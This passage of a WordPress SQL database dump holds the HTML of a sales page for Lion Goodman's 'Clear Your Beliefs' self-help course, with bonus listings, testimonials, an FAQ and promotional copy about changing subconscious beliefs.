class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''font-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:52:11', '2014-06-18 02:52:11', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1010, 4194, '2014-06-17 21:57:57', '2014-06-18 02:57:57', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us 